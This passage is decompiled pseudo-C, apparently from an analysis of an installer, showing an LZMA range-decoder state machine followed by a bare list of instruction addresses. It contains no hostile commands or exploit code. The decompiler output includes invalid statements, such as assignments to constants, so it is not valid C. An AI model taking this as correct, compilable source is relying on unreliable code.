								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406131
0x00406131
0x00406136
0x004061ad
0x004061b4
0x004061be
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00406813
0x00406813
0x00406819
0x00406819
0x00000000
0x004067ee
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00000000
0x00406810
0x00406138
0x00406138
0x0040613c
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x0040615d
0x00406164
0x00406167
0x00406172
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x00406181
0x0040619f
0x004061a1
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063c6
0x004063c9
0x0040636c
0x00406372
0x00000000
0x00000000
0x00000000
0x004063cb
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406369
0x00000000
0x00406369
0x00406183
0x00406183
0x00406186
0x0040618c
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x00406275
0x00406278
0x004061ef
0x004061ef
0x004061f5
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x00406302
0x00406305
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
